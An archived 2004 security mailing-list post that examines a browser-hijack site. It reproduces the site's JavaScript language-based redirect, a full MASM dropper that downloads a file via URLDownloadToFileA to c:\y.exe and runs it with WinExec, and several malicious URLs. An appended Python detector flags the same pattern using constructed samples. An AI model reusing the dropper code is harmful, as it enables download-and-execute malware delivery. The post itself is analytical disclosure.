Open Source and information security mailing list archives
 
Message-ID: <C7D0C474-AEBE-11D8-9CFC-0003937A28B4@dalhuijsen.com>
From: thijs at dalhuijsen.com (Matthijs Dalhuijsen)
Subject: browser hijack by apache sites

On 24-mei-04, at 14:46, Feher Tamas wrote:

>> http://www.b00gle.com/fa/?d=get

good thing the internet has a memory :)
http://216.239.59.104/search?q=cache:yYCmQqdLUvMJ:www.b00gle.com/fa/%3Fd%3Dget+&hl=en
http://www.google.com/search?q=cache:iyMDunIkp08J:www.b00gle.com/fa/tool.html+&hl=en


http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/ show the  
same files, as if copied in a for loop

I especially liked 2 files in the dir: counter.htm, containing the
extremely funny
<script language="JavaScript">
<!--
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "home.html";
//-->
</script>






but then I saw this:
http://www.pizdato.biz/acc10/2DimensionOfExploits.asm
Hehehe, Open Source is getting big! Didn't see no GPL licence, so I hope
I'm not violating someone's copyright by posting this here...

.386

.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc

includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

.data

	szLibrary db "urlmon.dll",0
	szFunction db "URLDownloadToFileA",0

	szFileName db "c:\y.exe", 0

.code
start:

	invoke GetCommandLineA

	add	ax,	0Ah
	lea	ecx,	[eax]
	push	ecx

	invoke LoadLibrary, addr szLibrary
	invoke GetProcAddress, eax, addr szFunction

	pop	ecx
	push	0
	push	0
	lea 	ebx,	[szFileName]
	push	ebx
	push	ecx
	push	0
	call	eax

	invoke WinExec, addr szFileName, 1
	invoke ExitProcess, NULL

end start



Yet I do feel a bit suspicious about this set of files... bit TOO
educating, I think ;)

cheers!

thijs
--

If I had 6 hours to chop down a tree, I'd spend the first four
sharpening the axe.
                                        -- Abraham Lincoln
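
Added example, not part of the original post: a static triage check in Python for the pattern visible in the listing above (a download API name stored as a data string, a hard-coded drop path, and an execution call). The function names, the scoring, the two extra execution API names and the sample byte strings are assumptions constructed for illustration.

```python
import re

# Strings taken from the listing quoted in the post (lower-cased for matching).
API_NAME = b"urldownloadtofilea"  # stored as data, resolved via GetProcAddress
LIB_NAME = b"urlmon.dll"
EXEC_APIS = (b"winexec", b"createprocessa", b"shellexecutea")  # last two assumed
# Assumption: a hard-coded drop target is an .exe directly under a drive root.
DROP_PATH = re.compile(rb"[a-z]:\\[\w.\-]{1,64}\.exe", re.I)
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def extract_strings(blob):
    """Printable ASCII runs of 4+ bytes, as the `strings` utility reports."""
    return ASCII_RUN.findall(blob)


def triage(blob):
    """Score a file image for the download-to-fixed-path-then-run pattern."""
    runs = extract_strings(blob)
    lowered = [r.lower() for r in runs]
    hits = {
        "download_api": any(API_NAME in r for r in lowered),
        "urlmon": any(LIB_NAME in r for r in lowered),
        "exec_api": any(a in r for r in lowered for a in EXEC_APIS),
        "drop_paths": sorted({m.decode() for r in runs for m in DROP_PATH.findall(r)}),
    }
    # All three together form the full chain; two warrant review; one alone
    # is common in legitimate software.
    score = sum([hits["download_api"], hits["exec_api"], bool(hits["drop_paths"])])
    hits["verdict"] = {3: "dropper-like", 2: "review"}.get(score, "no match")
    return hits


def image(*strings):
    """Build a constructed test image: fake header plus NUL-separated strings."""
    return b"MZ\x90\x00" + b"\x00".join(strings) + b"\x00"


# Constructed samples, not real binaries.
SAMPLE_STUB = image(b"urlmon.dll", b"URLDownloadToFileA", b"c:\\y.exe",
                    b"GetCommandLineA", b"LoadLibraryA", b"WinExec", b"ExitProcess")
SAMPLE_PARTIAL = image(b"urlmon.dll", b"URLDownloadToFileA", b"WinExec")
SAMPLE_BENIGN = image(b"kernel32.dll", b"GetCommandLineA", b"ExitProcess")

if __name__ == "__main__":
    for name in ("SAMPLE_STUB", "SAMPLE_PARTIAL", "SAMPLE_BENIGN"):
        print(name, triage(globals()[name]))
```

String matching of this kind only catches unpacked images; treat a hit as a reason to look closer, not as a conviction.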

